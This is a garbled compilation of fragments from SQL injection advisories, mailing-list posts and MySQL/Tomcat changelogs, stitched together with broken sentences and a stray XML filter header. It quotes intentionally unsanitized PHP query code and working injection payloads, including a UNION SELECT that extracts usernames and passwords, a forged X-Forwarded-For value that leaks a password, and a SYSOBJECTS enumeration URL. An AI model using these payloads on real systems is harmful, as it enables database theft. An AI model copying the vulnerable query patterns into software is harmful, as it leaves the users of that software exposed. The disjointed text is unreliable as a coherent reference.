</values>
<filter>
<offset>0</offset>
<limit>60</limit>
<order_by>EVNTYPE asc</order_by>
<sql>(EVNTITLE LIKE '%SQL INJECTION TEST%' OR
EVNNOTE LIKE '%SQL INJECTION TEST%')
</sql>
</filter>
</item>
# SQL injection vulnerable code in 'kaibb/rss.php'
if ( isset($_GET['forum']))
{
$id = $secure->clean($_GET['forum']);
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '".$_GET['forum']."' ORDER BY id DESC LIMIT 15");
} else {
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics ORDER BY id DESC LIMIT 15");
}
# inc/function.php
example:
'having 1=1--
result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1--%')) Order By Topics.AddDate;'.
or just a simple '
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'.
----
permalink.php, line 298:
$prevlink = mysql_query("SELECT PostID FROM ".POSTS_TBL." WHERE PostID<".$_GET['PostID']." AND Draft=0 ORDER BY Timestamp DESC LIMIT 1");
----
permalink.php, line 304:
$whichcategory = Trim($_POST['category']);
..
if ($whichcategory=='All'){
$query = "SELECT * FROM content ORDER BY id DESC";
}else{
$query = "SELECT * FROM content WHERE topic ='" . $whichcategory . "' ORDER BY id DESC";
}
$result = mysql_query($query);
..
$query = $db->query("
SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts
FROM ".TABLE_PREFIX."posts p
LEFT JOIN ".TABLE_PREFIX."forums f ON (f.fid=p.fid)
WHERE p.tid='$tid' AND p.pid IN($pidin)
ORDER BY dateline ASC
");
-------------------------------------------------------------------------------
It is obvious that the "$pids" argument is used in the SQL query without any
sanitization, so an SQL injection hole exists here.
Impact: SQL injection
Description:
categories.php and other pages of php pro bid accept user-supplied
order-by and ASC/DESC fields.
The software prints helpful messages too:
SQL Query: SELECT a.auction_id, a.name, a.start_price, a.max_bid,
a.nb_bids, a.currency, a.end_time, a.closed, a.bold, a.hl,
Proof of concept:
-----------------
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input, allowing an attacker with
"Editor" privileges to inject arbitrary SQL commands in the "orderby"
and "order" parameters passed as array members to the vulnerable filter
when sorting for example link categories.
The following URLs could be used to perform blind SQL injection
attacks:
example:
'having 1=1--
Result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)
Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.
or
'group by tblMain.fldArtNr having 1=1--
result:
}
else {
$max_results = 10;
}
..
$sql = "SELECT * FROM " . newsdb . " ORDER BY Date DESC LIMIT $from, $max_results ";
$sql_result = mysql_query($sql , $conn) or die ("Couldn't execute query.");
-----------------[ source code end ]-----------------------------------
As seen above, there is SQL injection in the "LIMIT x,y" part of the SQL query.
This vulnerability differs from the previous cases because there is an "ORDER BY"
before "LIMIT" in the vulnerable SQL query. It renders the common "UNION" attack method
Result:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near
'waraxe order by requests.request LIMIT 0,50' at line 1
Test 2:
http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+
1.0.13 does not appear to be vulnerable to this.
$query = "SELECT text"
. "\n FROM #__poll_data"
. "\n WHERE pollid = " . (int) $pollid
. "\n ORDER BY id"
;
On 26 Sep 2007 19:09:17 -0000, security@soqor.net <security@soqor.net> wrote:
> Hello
* LOAD DATA INFILE did not check for SQL errors and sent an OK packet
even when errors were already reported. Also, an assert related to
client-server protocol checking in debug servers sometimes was raised
when it should not have been. (Bug#52512)
* Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY
(SELECT ... WHERE ...) could cause a server crash. (Bug#52711)
* The server could crash if there were alternate reads from two
indexes on a table using the HANDLER interface. (Bug#54007)
$this->_sort_arr['field'] = SQL_TITLE;
} else {
$ord = $this->_sort_arr['field'];
}
$order_sql = ' ORDER BY ' . $ord . ' ' . strtoupper($this->_sort_arr['direction']);
...
filters are inefficient, see COM_applyFilter() which calls COM_applyBasicFilter()
in /public/lib-common.php near line 5774.
#
# }
# else {
#
# $query .=" (INSTR(`title`, '$keywords[0]') > '0' || INSTR(`body`, '$keywords[0]') > '0' || ...)";} <--------INJECTION HERE
# $pquery=$query.';'; $query.=" ORDER BY mod_date DESC LIMIT $pg, $max;"; //echo $query;
#
# ...
#
# }
#
password of a registered user.
$id = (isset($_GET['id']) && $_GET['id'] !='') ? $_GET['id'] : getlastid();
$SQL = "SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC";
$resulted = $db->query($SQL, $querys);
while ($result = mysql_fetch_assoc($resulted))
$comments[] = $result;
> ############## SQL Search Vuln ###############
>
> The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server.
>
> SQL query:
> $signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC");
>
> The $QUERY is what we submit through search box so injecting this will sql inject the server.
> The following is the sample sql injection example.
>
>
- Not vulnerable: ilch 1.1M
- Exploit: Spoof your x-forwarded-for header to:
127.0.0.1', (select `pass` from prefix_user WHERE `id` > 0
ORDER BY `id` LIMIT 1)) /*
Then create a guestbook entry.
- Timeline:
3.Feb.09: Vuln reported to ilch.de
Technical Details:
Normal input for the 'LngId' parameter contains a code such as ENG, DEU, JP, denoting the language type. This parameter is not properly validated and the injection of SQL statements within it allows attackers unrestricted access to enumerate information from the database. For example:
https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1
Proof of Concept:
A Proof of Concept (RDdbenum.py) has been developed to automate enumeration of entire database content available from http://www.irmplc.com/Tools/RDdbenum.py
from two indexes on a table, which triggers an assertion failure
(CVE-2010-3681).
MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote
authenticated users to cause a denial of service (mysqld daemon crash)
by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY \(SELECT
... WHERE ...\)" statements, which triggers a NULL pointer dereference
in the Item_singlerow_subselect::store function (CVE-2010-3682).
MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when
a LOAD DATA INFILE request generates SQL errors, which allows remote
nGenuity Information Services - Security Advisory
Advisory ID: NGENUITY-2009-005 - OpenCart Order By Blind SQL Injection
Application: OpenCart 1.1.8
Vendor: OpenCart
Vendor website: http://www.opencart.com
Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
I. BACKGROUND
"OpenCart is an open source PHP-based online shopping cart system. A robust e-commerce
SELECT pm.pmid, title, fromusername
FROM " . TABLE_PREFIX . "pmtext AS pmtext
LEFT JOIN " . TABLE_PREFIX . "pm AS pm USING(pmtextid)
WHERE pm.userid = " . $vbulletin->userinfo['userid'] . "
AND pm.folderid = 0
ORDER BY dateline DESC
LIMIT 1");
$newpm['username'] =
addslashes_js(unhtmlspecialchars($newpm['fromusername'], true), '"');
$newpm['title'] = addslashes_js(unhtmlspecialchars($newpm['title'],
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
CVE-2011-4075
Input passed to the "orderby" parameter in cmd.php (when "cmd" is set to
"query_engine", "query" is set to "none", and "search" is set to e.g.
"1") is not properly sanitised in lib/functions.php before being used in a
"create_function()" function call. This can be exploited to inject and
execute arbitrary PHP code.
/---------------------
$id = $_GET['p'];
$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE
comment_post_ID = $id AND comment_approved != 'spam' ORDER BY
comment_date DESC");
----------------------/
As you can see in the presented code, the value of $id is taken from the
HTTP GET "p" variable, and $id is later used unescaped
inside the SQL query passed to the get_results method of the $wpdb object
- - Tomcat 5.5.x
- Not affected
Description:
The session list screen (provided by sessionList.jsp) in affected
versions uses the orderBy and sort request parameters without applying
filtering and therefore is vulnerable to a cross-site scripting attack.
Users should be aware that Tomcat 6 does not use httpOnly for session
cookies by default so this vulnerability could expose session cookies
from the manager application to an attacker.
A review of the Manager application by the Apache Tomcat security team
a server crash (CVE-2010-3680).
* The server could crash if there were alternate reads from two
indexes on a table using the HANDLER interface (CVE-2010-3681).
* Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY
(SELECT ... WHERE ...) could cause a server crash (CVE-2010-3682).
* During evaluation of arguments to extreme-value functions (such
as LEAST() and GREATEST()), type errors did not propagate properly,
causing the server to crash (CVE-2010-3833).